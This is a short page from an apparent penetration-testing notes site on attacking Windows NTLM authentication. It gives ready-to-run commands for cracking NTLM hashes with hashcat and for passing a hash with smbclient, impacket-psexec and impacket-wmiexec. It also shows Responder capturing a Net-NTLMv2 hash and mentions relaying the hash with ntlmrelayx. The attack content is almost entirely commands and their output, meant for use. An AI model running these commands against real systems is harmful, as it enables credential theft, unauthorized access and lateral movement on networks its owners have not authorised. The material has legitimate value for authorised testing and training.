search

NTLM and Net-NTLMv2

hashtag
NTLM

NTLM hashes are typically retrieved after compromising a Windows host, eleveting to System, and using a tool such as mimikats to dump the SAM file.

hashcat -m 1000 myhackingblog.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

If the hash can't be cracked it can still be passed. 

smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b [email protected]

impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b [email protected]

hashtag
NTLMv2

Net-NTLMv2 hashes are typically retrieved via Respodner. 

kali@kali:~$ sudo responder -I eth0 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.1.0

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C
...
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
...
[+] Listening for events... 
[SMB] NTLMv2-SSP Client   : ::ffff:192.168.13.37
[SMB] NTLMv2-SSP Username : ADMIN01\james
[SMB] NTLMv2-SSP Hash     : james::ADMIN01:1f9d4c51f6e74653:795F138EC69C274D0FD53BB32908A72B:010100000000000000B050CD1777D801B7585DF5719ACFBA0000000002000800360057004D00520001001E00570049004E002D00340044004E004800550058004300340054004900430004003400570049004E002D00340044004E0048005500580043003400540049004300

Not all hashes can be cracked luckily it's still possible to relay them. If you don't have a specific target in mind provide a list of hosts. ntlmrelayx will set up an SMB server it does not need to be run in conjuncture with responder.

PreviousEmpireNextWord Lists

Last updated